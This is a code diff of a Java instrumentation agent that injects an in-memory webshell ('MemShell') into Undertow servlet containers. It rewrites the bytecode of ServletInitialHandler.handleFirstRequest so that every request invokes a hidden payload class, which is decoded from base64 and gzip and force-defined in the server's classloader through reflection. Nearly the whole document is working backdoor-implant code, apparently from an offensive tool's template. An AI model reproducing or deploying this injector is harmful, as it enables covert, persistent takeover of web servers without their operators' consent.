1818public class UndertowServletHandlerAgentInjector implements ClassFileTransformer {
1919 private static final String TARGET_CLASS = "io/undertow/servlet/handlers/ServletInitialHandler" ;
2020 private static final String TARGET_METHOD_NAME = "handleFirstRequest" ;
21- private static Class <?> payload ;
22- private static ClassLoader targetClassLoader ;
23- private static final String thisClassName = UndertowServletHandlerAgentInjector .class .getName ();
2421
2522 public static String getClassName () {
2623 return "{{advisorName}}" ;
@@ -30,20 +27,6 @@ public static String getBase64String() {
3027 return "{{base64String}}" ;
3128 }
3229
33-
34- @ Override
35- public boolean equals (Object obj ) {
36- if (payload == null ) {
37- payload = new AgentShellClassLoader (targetClassLoader ).defineDynamicClass (gzipDecompress (decodeBase64 (getBase64String ())));
38- }
39- try {
40- return payload .newInstance ().equals (obj );
41- } catch (Throwable e ) {
42- e .printStackTrace ();
43- return false ;
44- }
45- }
46-
4730 public static void premain (String args , Instrumentation inst ) throws Exception {
4831 launch (inst );
4932 }
@@ -59,17 +42,17 @@ private static void launch(Instrumentation inst) throws Exception {
5942 String name = allLoadedClass .getName ();
6043 if (TARGET_CLASS .replace ("/" , "." ).equals (name )) {
6144 inst .retransformClasses (allLoadedClass );
45+ System .out .println ("MemShell Agent is working at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest" );
6246 }
6347 }
64- System .out .println ("MemShell Agent is working at io.undertow.servlet.handlers.ServletInitialHandler.handleFirstRequest" );
6548 }
6649
6750 @ Override
6851 @ SuppressWarnings ("all" )
6952 public byte [] transform (final ClassLoader loader , String className , Class <?> classBeingRedefined ,
7053 ProtectionDomain protectionDomain , byte [] bytes ) {
7154 if (TARGET_CLASS .equals (className )) {
72- targetClassLoader = loader ;
55+ defineTargetClass ( loader ) ;
7356 try {
7457 ClassReader cr = new ClassReader (bytes );
7558 ClassWriter cw = new ClassWriter (cr , ClassWriter .COMPUTE_MAXS | ClassWriter .COMPUTE_FRAMES ) {
@@ -81,7 +64,7 @@ protected ClassLoader getClassLoader() {
8164 ClassVisitor cv = getClassVisitor (cw );
8265 cr .accept (cv , ClassReader .EXPAND_FRAMES );
8366 return cw .toByteArray ();
84- } catch (Exception e ) {
67+ } catch (Throwable e ) {
8568 e .printStackTrace ();
8669 }
8770 }
@@ -98,8 +81,8 @@ public MethodVisitor visitMethod(int access, String name, String descriptor,
9881 if (TARGET_METHOD_NAME .equals (name )) {
9982 try {
10083 Type [] argumentTypes = Type .getArgumentTypes (descriptor );
101- return new AgentShellMethodVisitor (mv , argumentTypes , thisClassName );
102- } catch (Exception e ) {
84+ return new AgentShellMethodVisitor (mv , argumentTypes , getClassName () );
85+ } catch (Throwable e ) {
10386 e .printStackTrace ();
10487 }
10588 }
@@ -129,23 +112,10 @@ public void visitCode() {
129112 mv .visitTryCatchBlock (tryStart , tryEnd , catchHandler , "java/lang/Throwable" );
130113
131114 mv .visitLabel (tryStart );
132- mv .visitLdcInsn (className );
133- mv .visitInsn (Opcodes .ICONST_1 );
134- mv .visitMethodInsn (Opcodes .INVOKESTATIC ,
135- "java/lang/ClassLoader" ,
136- "getSystemClassLoader" ,
137- "()Ljava/lang/ClassLoader;" ,
138- false );
139- mv .visitMethodInsn (Opcodes .INVOKESTATIC ,
140- "java/lang/Class" ,
141- "forName" ,
142- "(Ljava/lang/String;ZLjava/lang/ClassLoader;)Ljava/lang/Class;" ,
143- false );
144- mv .visitMethodInsn (Opcodes .INVOKEVIRTUAL ,
145- "java/lang/Class" ,
146- "newInstance" ,
147- "()Ljava/lang/Object;" ,
148- false );
115+ String internalClassName = className .replace ('.' , '/' );
116+ mv .visitTypeInsn (Opcodes .NEW , internalClassName );
117+ mv .visitInsn (Opcodes .DUP );
118+ mv .visitMethodInsn (Opcodes .INVOKESPECIAL , internalClassName , "<init>" , "()V" , false );
149119 mv .visitInsn (Opcodes .SWAP );
150120 mv .visitMethodInsn (Opcodes .INVOKEVIRTUAL ,
151121 "java/lang/Object" ,
@@ -195,85 +165,6 @@ private int getArgIndex(final int arg) {
195165 }
196166 }
197167
198- public static class AgentShellClassLoader extends URLClassLoader {
199- private final ClassLoader targetClassLoader ;
200-
201- public AgentShellClassLoader (ClassLoader targetClassLoader ) {
202- super (new URL [0 ], ClassLoader .getSystemClassLoader ());
203- this .targetClassLoader = targetClassLoader ;
204- }
205-
206- @ SuppressWarnings ("all" )
207- private Object getClassLoadingLock0 (String className ) {
208- try {
209- return getClassLoadingLock (className );
210- } catch (Throwable t ) {
211- return this ;
212- }
213- }
214-
215- public Class <?> defineDynamicClass (byte [] bytes ) {
216- return defineClass (bytes , 0 , bytes .length );
217- }
218-
219- @ Override
220- protected Class <?> loadClass (String name , boolean resolve ) throws ClassNotFoundException {
221- Class <?> clazz = null ;
222- if (name == null || name .startsWith ("java." )) {
223- clazz = getParent ().loadClass (name );
224- } else {
225- try {
226- clazz = findLoadedClass (name );
227- if (clazz == null ) {
228- synchronized (getClassLoadingLock0 (name )) {
229- clazz = findLoadedClass (name );
230- if (clazz == null ) {
231- clazz = findClass (name );
232- }
233- }
234- }
235- } catch (Throwable ignored ) {
236- }
237- try {
238- if (clazz == null ) {
239- clazz = getParent ().loadClass (name );
240- }
241- } catch (ClassNotFoundException e ) {
242- try {
243- clazz = tryToLoadByContextClassLoader (name , resolve );
244- } catch (Throwable ignored ) {
245- throw e ;
246- }
247- }
248- }
249-
250- if (resolve ) {
251- resolveClass (clazz );
252- }
253- return clazz ;
254- }
255-
256- public Class <?> tryToLoadByContextClassLoader (String name , boolean resolve ) throws ClassNotFoundException {
257- if (targetClassLoader != null ) {
258- Class <?> clazz = targetClassLoader .loadClass (name );
259- if (resolve ) {
260- resolveClass (clazz );
261- }
262- return clazz ;
263- }
264- ClassLoader contextClassLoader = Thread .currentThread ().getContextClassLoader ();
265- if (contextClassLoader != null ) {
266- Class <?> clazz = contextClassLoader .loadClass (name );
267- if (resolve ) {
268- resolveClass (clazz );
269- }
270- return clazz ;
271- } else {
272- return null ;
273- }
274- }
275- }
276-
277168 @ SuppressWarnings ("all" )
278169 public static byte [] decodeBase64 (String base64Str ) {
279170 Class <?> decoderClass ;
@@ -315,4 +206,20 @@ public static byte[] gzipDecompress(byte[] compressedData) {
315206 }
316207 }
317208 }
209+
210+ @ SuppressWarnings ("all" )
211+ public void defineTargetClass (ClassLoader loader ) {
212+ try {
213+ loader .loadClass (getClassName ());
214+ return ;
215+ } catch (ClassNotFoundException ignored ) {
216+ }
217+ byte [] classBytecode = gzipDecompress (decodeBase64 (getBase64String ()));
218+ try {
219+ java .lang .reflect .Method defineClass = ClassLoader .class .getDeclaredMethod ("defineClass" , byte [].class , int .class , int .class );
220+ defineClass .setAccessible (true );
221+ defineClass .invoke (loader , classBytecode , 0 , classBytecode .length );
222+ } catch (Exception ignored ) {
223+ }
224+ }
318225}
0 commit comments